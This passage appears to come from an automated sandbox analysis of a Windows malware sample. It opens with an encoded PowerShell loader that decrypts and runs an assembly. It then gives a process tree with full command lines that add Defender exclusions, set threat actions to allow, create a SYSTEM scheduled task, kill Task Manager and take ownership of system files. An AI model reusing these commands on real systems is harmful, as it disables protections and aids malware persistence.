BioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA4⤵
- UAC bypass
- Windows security bypass
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\vir_24f1c8ec-2607-4230-9cfb-c7baba4af4c5\the.exe" -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6924
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"5⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
PID:6128 -
C:\Users\Admin\Pictures\fyKBjrO0HsSpn0s1aErlpNHR.exe"C:\Users\Admin\Pictures\fyKBjrO0HsSpn0s1aErlpNHR.exe"6⤵
- Executes dropped EXE
PID:6256 -
C:\Users\Admin\AppData\Local\Temp\7zS1E8A.tmp\Install.exe.\Install.exe7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6968 -
C:\Users\Admin\AppData\Local\Temp\7zS208E.tmp\Install.exe.\Install.exe /EdidXc "385104" /S8⤵
- Checks BIOS information in registry
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2724 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"9⤵PID:5356
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"10⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:5316 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 611⤵PID:7100
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 612⤵PID:5812
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"10⤵
- Indirect Command Execution
PID:4892 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 611⤵
- System Location Discovery: System Language Discovery
PID:5248 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 612⤵
- System Location Discovery: System Language Discovery
PID:3784
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"10⤵
- Indirect Command Execution
PID:3740 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 611⤵PID:2472
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 612⤵
- System Location Discovery: System Language Discovery
PID:6720
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"10⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:6936 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 611⤵
- System Location Discovery: System Language Discovery
PID:2160 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 612⤵PID:1288
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"10⤵
- Indirect Command Execution
PID:4572 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force11⤵PID:6172
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1900 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force13⤵
- System Location Discovery: System Language Discovery
PID:6556
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"9⤵
- Indirect Command Execution
PID:6168 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵
- System Location Discovery: System Language Discovery
PID:3208 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1000 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5616
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvuqyuXCqiBajvTxPj" /SC once /ST 22:49:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS208E.tmp\Install.exe\" nb /tdidk 385104 /S" /V1 /F9⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:6168
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2724 -s 10849⤵
- Program crash
PID:4308
-
-
-
-
-
C:\Users\Admin\Pictures\ifapiSTM20eylY5gWCyZkyBA.exe"C:\Users\Admin\Pictures\ifapiSTM20eylY5gWCyZkyBA.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
PID:6756
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6596
-
-
C:\Users\Admin\AppData\Local\Temp\vir_24f1c8ec-2607-4230-9cfb-c7baba4af4c5\wimloader.dllwimloader.dll3⤵
- Executes dropped EXE
PID:6680 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_555b7df5-db54-4c41-92bb-56d4d9b95ebc\caller.cmd" "4⤵PID:6732
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_24f1c8ec-2607-4230-9cfb-c7baba4af4c5\ac3.exeac3.exe3⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:5784
-
-
C:\Windows\SysWOW64\PING.EXEping trustsentry.com -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6304
-
-
C:\Windows\SysWOW64\PING.EXEping ya.ru -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6344
-
-
C:\Windows\SysWOW64\PING.EXEping tria.ge -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5488
-
-
C:\Windows\SysWOW64\xcopy.exexcopy bloatware C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:1228
-
-
C:\Windows\SysWOW64\xcopy.exexcopy beastify.url C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:7084
-
-
C:\Windows\SysWOW64\xcopy.exexcopy shell1.ps1 C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:6600
-
-
C:\Windows\SysWOW64\takeown.exetakeown /R /F C:\Windows\explorer.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2572
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\Windows\explorer.exe /grant Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:720
-
-
C:\Windows\SysWOW64\takeown.exetakeown /R /F C:\Windows\System32\dwm.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:6600
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\Windows\System32\dwm.exe /grant Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6824
-
-
C:\Windows\SysWOW64\xcopy.exexcopy xcer.cer C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:6120
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:6372
-
-
-
C:\Users\Admin\AppData\Local\Temp\cf0b7170-371f-4c81-896b-ee0ba534e3b0\packer.exe"C:\Users\Admin\AppData\Local\Temp\cf0b7170-371f-4c81-896b-ee0ba534e3b0\packer.exe" "C:\Users\Admin\AppData\Local\Temp\cf0b7170-371f-4c81-896b-ee0ba534e3b0\unpacker.exe" "C:\Users\Admin\AppData\Local\Temp\vir.exe" "!main.cmd" "C:\Users\Admin\AppData\Local\Temp\vir_24f1c8ec-2607-4230-9cfb-c7baba4af4c5" "" True True False 0 -repack2⤵
- Executes dropped EXE
PID:4968
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4072
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5332
-
C:\Windows\system32\efsui.exeefsui.exe /efs /keybackup1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5916
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 396 -ip 3961⤵PID:5756
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004D0 0x00000000000004B81⤵
- Suspicious use of AdjustPrivilegeToken
PID:7120
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2904
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:3740
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\f47f07bb76ee4407812cf209ec4678ce /t 5836 /p 60481⤵PID:6424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:3200 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{4c046bd2-b21f-614f-8741-1e5991683013}\droidcamvideo.inf" "9" "41e7d49db" "0000000000000154" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\droidcam\lib"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:5596
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "231" "ROOT\MEDIA\0000" "C:\Windows\INF\oem3.inf" "oem3.inf:c14ce8845b5e8bf3:DroidCamVideo.Device:21.4.1.0:droidcamvideo," "41e7d49db" "000000000000015C" "460c"2⤵
- Drops file in Windows directory
- Modifies registry class
PID:6848
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{d68b5c89-d9f6-384e-b467-71905627f9c7}\droidcam.inf" "9" "4e67c8bbf" "0000000000000160" "WinSta0\Default" "000000000000017C" "208" "c:\program files (x86)\droidcam\lib"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:6876
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "231" "ROOT\MEDIA\0001" "C:\Windows\INF\oem4.inf" "oem4.inf:ed86ca11f01d07d6:DroidCam_PCMEX:1.0.0.0:droidcam," "4e67c8bbf" "0000000000000160" "460c"2⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:6304
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k CameraMonitor1⤵PID:7084
-
C:\Users\Admin\AppData\Local\Temp\7zS208E.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS208E.tmp\Install.exe nb /tdidk 385104 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Modifies data under HKEY_USERS
PID:1368 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:3600
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:5236 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:6808
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:5740
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:5776 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:4576 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:7020
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:3088 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:6304
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:3824
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:3768 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:6352
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1712
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
PID:6952 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:3096
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:6056 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:3616
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:7108 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:6640
-
